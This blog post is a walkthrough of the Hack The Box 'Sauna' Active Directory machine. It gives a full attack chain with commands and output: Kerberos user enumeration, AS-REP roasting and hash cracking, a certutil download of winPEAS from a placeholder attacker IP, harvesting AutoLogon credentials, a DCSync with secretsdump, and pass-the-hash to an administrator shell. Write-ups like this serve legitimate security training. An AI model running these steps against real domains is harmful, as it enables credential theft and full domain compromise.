DEV Community

Cover image for Sauna CTF HTB
Iftikhar Huseynov
Iftikhar Huseynov

Posted on

Sauna CTF HTB

Hi what’s up, welcome to my page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.

Enumeration
nmap -sV -sC 10.129.95.180
Starting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400
Nmap scan report for 10.129.95.180
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026–07–04T00:17:20
|_ start_date: N/A
|_clock-skew: 6h59m50s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

As we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.

RPC port

rpcclient -U "" -N 10.129.95.180
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C

We can’t use rpc port without authentication.

SMB port

`smbclient -L //10.129.95.180 
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
 - - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`
Enter fullscreen mode Exit fullscreen mode

Same thing.

LDAP
We have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.

`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1`
Enter fullscreen mode Exit fullscreen mode

Domain Controller- egotistical-bank.local. And there are no interesting things.

KERBEROS
Port 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.

./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

2026/07/03 13:31:29 >  Using KDC(s):
2026/07/03 13:31:29 >   10.129.95.180:88

2026/07/03 13:32:09 >  [+] VALID USERNAME:       administrator@egotistical-bank.local
2026/07/03 13:35:45 >  [+] VALID USERNAME:       hsmith@egotistical-bank.local
2026/07/03 13:36:30 >  [+] VALID USERNAME:       Administrator@egotistical-bank.local
2026/07/03 13:38:47 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2026/07/03 13:58:42 >  [+] VALID USERNAME:       Fsmith@egotistical-bank.local
Enter fullscreen mode Exit fullscreen mode

We found 3 users.

AES-ROASTING
For these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.

 GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd
Enter fullscreen mode Exit fullscreen mode

We got fsmith’s hash.

Cracking the hash
Hashcat help us to crack this hash.

hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23

We found fsmith’s password.

Gaining access to evil-winrm | PORT 5985

evil-winrm -i <ip> -u <username> -p <password>

evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23

Evil-WinRM shell v3.9



Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/3/2026   5:14 PM             34 user.txt



*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*******
Enter fullscreen mode Exit fullscreen mode

We got user.txt in desktop directory.

Privilege Escalation
Firstly,we should upload winpeas on the victim machine for privilege escalation methods.

On attacker machine

Make sure you are supposed to be in directory which has winpeas inside.

python3 -m http.server 80
On victim machine

certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe
We can run winpeas with .\winpeas.exe

Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
Enter fullscreen mode Exit fullscreen mode

And there it is autologon user:svc_loanmanager

BloodHound

Take a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.

We use secretsdump for administrator hash.

`

console
console
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
import('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[
] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
`

`
Hash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.

crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
Yeppp, we can use this hash for login!

ROOT FLAG

>impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180

C:\Users> cd Administrator

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM

.
07/14/2021 03:35 PM ..
07/03/2026 05:14 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,812,263,936 bytes free
C:\Users\Administrator\Desktop> type root.txt
*********``
BINGOOO!!!! We got root flag. Stay safe and goodbye.

Top comments (0)